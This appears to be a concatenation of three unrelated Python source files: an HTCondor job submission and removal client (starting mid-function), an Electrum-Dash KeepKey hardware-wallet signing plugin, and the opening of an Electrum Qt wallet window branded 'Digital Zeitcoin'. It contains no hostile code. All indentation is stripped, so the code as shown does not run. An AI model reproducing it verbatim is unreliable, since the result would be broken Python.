batchIDs_list = ['{0}.{1}'.format(clusterid, procid) for procid in range(n_jobs)]
tmpLog.debug('submitted {0} jobs: {1}'.format(n_jobs, ' '.join(batchIDs_list)))
else:
errStr = 'no job submitted: {0}'.format(errStr)
tmpLog.error(errStr)
else:
errStr = '{0} ; {1}'.format(stdErr, errStr)
tmpLog.error('submission failed: {0}'.format(errStr))
# Return
return (batchIDs_list, errStr)
@CondorClient.renew_session_and_retry
def submit_with_python(self, jdl_list, use_spool=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobSubmit.submit_with_python')
# Start
tmpLog.debug('Start')
# Initialize
errStr = ''
batchIDs_list = []
# Make list of jdl map with dummy submit objects
jdl_map_list = [ dict(htcondor.Submit(jdl).items()) for jdl in jdl_list ]
# Go
submit_obj = htcondor.Submit()
try:
with self.schedd.transaction() as txn:
# TODO: Currently spool is not supported in htcondor.Submit ...
submit_result = submit_obj.queue_with_itemdata(txn, 1, iter(jdl_map_list))
clusterid = submit_result.cluster()
first_proc = submit_result.first_proc()
num_proc = submit_result.num_procs()
batchIDs_list.extend(['{0}.{1}'.format(clusterid, procid)
for procid in range(first_proc, first_proc + num_proc)])
except RuntimeError as e:
errStr = '{0}: {1}'.format(e.__class__.__name__, e)
tmpLog.error('submission failed: {0}'.format(errStr))
raise
if batchIDs_list:
n_jobs = len(batchIDs_list)
tmpLog.debug('submitted {0} jobs: {1}'.format(n_jobs, ' '.join(batchIDs_list)))
elif not errStr:
tmpLog.error('submitted nothing')
tmpLog.debug('Done')
# Return
return (batchIDs_list, errStr)
def submit_with_python_process(self, jdl_list, use_spool=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobSubmit.submit_with_python_process')
# Start
tmpLog.debug('Start')
# Make list of jdl map with dummy submit objects
jdl_map_list = [ dict(htcondor.Submit(jdl).items()) for jdl in jdl_list ]
# Go
mp_queue = multiprocessing.Queue()
mp_process = multiprocessing.Process(target=condor_submit_process, args=(mp_queue, self.submissionHost, jdl_map_list))
mp_process.daemon = True
mp_process.start()
(batchIDs_list, errStr) = mp_queue.get()
mp_queue.close()
mp_process.terminate()
mp_process.join()
if batchIDs_list:
n_jobs = len(batchIDs_list)
tmpLog.debug('submitted {0} jobs: {1}'.format(n_jobs, ' '.join(batchIDs_list)))
elif not errStr:
tmpLog.error('submitted nothing')
tmpLog.debug('Done')
# Return
return (batchIDs_list, errStr)
# Condor job remove
class CondorJobManage(six.with_metaclass(SingletonWithID, CondorClient)):
# class lock
classLock = threading.Lock()
def __init__(self, *args, **kwargs):
self.submissionHost = str(kwargs.get('id'))
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0} thrid={1} oid={2}'.format(self.submissionHost, get_ident(), id(self)), method_name='CondorJobManage.__init__')
# Initialize
tmpLog.debug('Start')
self.lock = threading.Lock()
CondorClient.__init__(self, self.submissionHost, *args, **kwargs)
tmpLog.debug('Initialize done')
def remove(self, batchIDs_list=[]):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobManage.remove')
# Get all
tmpLog.debug('Start')
job_ads_all_dict = {}
if self.condor_api == 'python':
try:
retVal = self.remove_with_python(batchIDs_list)
except Exception as e:
tmpLog.error('Exception {0}: {1}'.format(e.__class__.__name__, e))
raise
else:
retVal = self.remove_with_command(batchIDs_list)
return retVal
def remove_with_command(self, batchIDs_list=[]):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobManage.remove_with_command')
# if workspec.batchID is None:
# tmpLog.info('Found workerID={0} has submissionHost={1} batchID={2} . Cannot kill. Skipped '.format(
# workspec.workerID, workspec.submissionHost, workspec.batchID))
# ret_list.append((True, ''))
#
# ## Parse condor remote options
# name_opt, pool_opt = '', ''
# if workspec.submissionHost is None or workspec.submissionHost == 'LOCAL':
# pass
# else:
# try:
# condor_schedd, condor_pool = workspec.submissionHost.split(',')[0:2]
# except ValueError:
# errStr = 'Invalid submissionHost: {0} . Skipped'.format(workspec.submissionHost)
# tmpLog.error(errStr)
# ret_list.append((False, errStr))
# name_opt = '-name {0}'.format(condor_schedd) if condor_schedd else ''
# pool_opt = '-pool {0}'.format(condor_pool) if condor_pool else ''
#
# ## Kill command
# comStr = 'condor_rm {name_opt} {pool_opt} {batchID}'.format(name_opt=name_opt,
# pool_opt=pool_opt,
# batchID=workspec.batchID)
# (retCode, stdOut, stdErr) = _runShell(comStr)
# if retCode != 0:
# comStr = 'condor_q -l {name_opt} {pool_opt} {batchID}'.format(name_opt=name_opt,
# pool_opt=pool_opt,
# batchID=workspec.batchID)
# (retCode, stdOut, stdErr) = _runShell(comStr)
# if ('ClusterId = {0}'.format(workspec.batchID) in str(stdOut) \
# and 'JobStatus = 3' not in str(stdOut)) or retCode != 0:
# ## Force to cancel if batch job not terminated first time
# comStr = 'condor_rm -forcex {name_opt} {pool_opt} {batchID}'.format(name_opt=name_opt,
# pool_opt=pool_opt,
# batchID=workspec.batchID)
# (retCode, stdOut, stdErr) = _runShell(comStr)
# if retCode != 0:
# ## Command failed to kill
# errStr = 'command "{0}" failed, retCode={1}, error: {2} {3}'.format(comStr, retCode, stdOut, stdErr)
# tmpLog.error(errStr)
# ret_list.append((False, errStr))
# ## Found already killed
# tmpLog.info('Found workerID={0} submissionHost={1} batchID={2} already killed'.format(
# workspec.workerID, workspec.submissionHost, workspec.batchID))
# else:
# tmpLog.info('Succeeded to kill workerID={0} submissionHost={1} batchID={2}'.format(
# workspec.workerID, workspec.submissionHost, workspec.batchID))
raise NotImplementedError
@CondorClient.renew_session_and_retry
def remove_with_python(self, batchIDs_list=[]):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobManage.remove_with_python')
# Start
tmpLog.debug('Start')
# Acquire class lock
with self.classLock:
tmpLog.debug('Got class lock')
# Initialize
ret_list = []
retMap = {}
# Go
n_jobs = len(batchIDs_list)
act_ret = self.schedd.act(htcondor.JobAction.Remove, batchIDs_list)
# Check if all jobs clear (off from schedd queue)
is_all_clear = (n_jobs == act_ret['TotalAlreadyDone'] + act_ret['TotalNotFound'] + act_ret['TotalSuccess'])
if act_ret and is_all_clear:
tmpLog.debug('removed {0} jobs: {1}'.format(n_jobs, ','.join(batchIDs_list)))
for batchid in batchIDs_list:
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
retMap[condor_job_id] = (True, '')
else:
tmpLog.error('job removal failed; batchIDs_list={0}, got: {1}'.format(batchIDs_list, act_ret))
# need to query queue for unterminated jobs not removed yet
clusterids_set = set([ get_job_id_tuple_from_batchid(batchid)[0] for batchid in batchIDs_list ])
clusterids_str = ','.join(list(clusterids_set))
requirements = 'member(ClusterID, {{{0}}}) && JobStatus =!= 3 && JobStatus =!= 4'.format(clusterids_str)
jobs_iter = self.schedd.xquery(requirements=requirements, projection=CONDOR_JOB_ADS_LIST)
all_batchid_map = {}
ok_batchid_list = []
ng_batchid_list = []
for job in jobs_iter:
job_ads_dict = dict(job)
batchid = get_batchid_from_job(job_ads_dict)
all_batchid_map[batchid] = job_ads_dict
for batchid in batchIDs_list:
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
if batchid in all_batchid_map:
ng_batchid_list.append(batchid)
retMap[condor_job_id] = (False, 'batchID={0} still unterminated in condor queue'.format(batchid))
else:
ok_batchid_list.append(batchid)
retMap[condor_job_id] = (True, '')
tmpLog.debug('removed {0} jobs: {1} ; failed to remove {2} jobs: {3}'.format(
len(ok_batchid_list), ','.join(ok_batchid_list), len(ng_batchid_list), ','.join(ng_batchid_list)))
tmpLog.debug('Done')
# Return
return retMap
#===============================================================
|
plugin.py
|
from binascii import hexlify, unhexlify
from electrum_dash.util import bfh, bh2u
from electrum_dash.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electrum_dash import constants
from electrum_dash.i18n import _
from electrum_dash.plugins import BasePlugin
from electrum_dash.transaction import deserialize, Transaction
from electrum_dash.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_dash.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never return if a KeepKey is plugged in
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# Returns the client for a given keystore; can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "DashTestnet" if constants.net.TESTNET else "Dash"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in ('standard',):
raise ScriptTypeNotSupported(_('This type of script is not supported with KeepKey.'))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_type = self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from the user
# because no more than one change address is allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import socket
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import icons_rc
from electrum import keystore
from electrum.bitcoin import COIN, is_valid, TYPE_ADDRESS
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (block_explorer, block_explorer_info, format_time,
block_explorer_URL, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds, StoreDict,
UserCancelled)
from electrum import Transaction, mnemonic
from electrum import util, bitcoin, commands, coinchooser
from electrum import SimpleConfig, paymentrequest
from electrum.wallet import Wallet, Multisig_Wallet
from amountedit import BTCAmountEdit, MyLineEdit, BTCkBEdit
from network_dialog import NetworkDialog
from qrcodewidget import QRCodeWidget, QRDialog
from qrtextedit import ShowQRTextEdit
from transaction_dialog import show_transaction
from electrum import ELECTRUM_VERSION
import re
from util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt4 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == QtCore.Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.invoices = gui_object.invoices
self.contacts = gui_object.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.num_zeros = int(config.get('num_zeros',2))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
tabs.addTab(self.create_history_tab(), _('History') )
tabs.addTab(self.create_send_tab(), _('Send') )
tabs.addTab(self.create_receive_tab(), _('Receive') )
self.addresses_tab = self.create_addresses_tab()
if self.config.get('show_addresses_tab', False):
tabs.addTab(self.addresses_tab, _('Addresses'))
tabs.addTab(self.create_contacts_tab(), _('Contacts') )
tabs.addTab(self.create_console_tab(), _('Console') )
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.connect(self, QtCore.SIGNAL('payment_request_ok'), self.payment_request_ok)
self.connect(self, QtCore.SIGNAL('payment_request_error'), self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.connect(self, QtCore.SIGNAL('network'), self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def toggle_addresses_tab(self):
show_addr = not self.config.get('show_addresses_tab', False)
self.config.set_key('show_addresses_tab', show_addr)
if show_addr:
self.tabs.insertTab(3, self.addresses_tab, _('Addresses'))
else:
i = self.tabs.indexOf(self.addresses_tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
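# Network callback entry point. This may run on a non-GUI thread, so anything
# that touches Qt widgets is forwarded to on_network_qt() via the 'network'
# signal; only thread-safe bookkeeping is done here.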
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
elif event in ['status', 'banner', 'verified']:
# Handle in GUI thread
self.emit(QtCore.SIGNAL('network'), event, *args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, *args):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.emit(SIGNAL('alias_received'))
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.need_update.set()
# Now that the GUI is initialized, show any transaction notifications that arrived before it was ready
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.mpk_menu.setEnabled(self.wallet.is_deterministic())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = 'Digital Zeitcoin Electrum %s - %s' % (self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Zeitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Zeitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder))
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename = unicode( QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) )
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
filename = line_dialog(self, _('New Wallet'), _('Enter file name')
+ ':', _('OK'), filename)
if not filename:
return
full_path = os.path.join(wallet_folder, filename)
if os.path.exists(full_path):
self.show_critical(_("File exists"))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
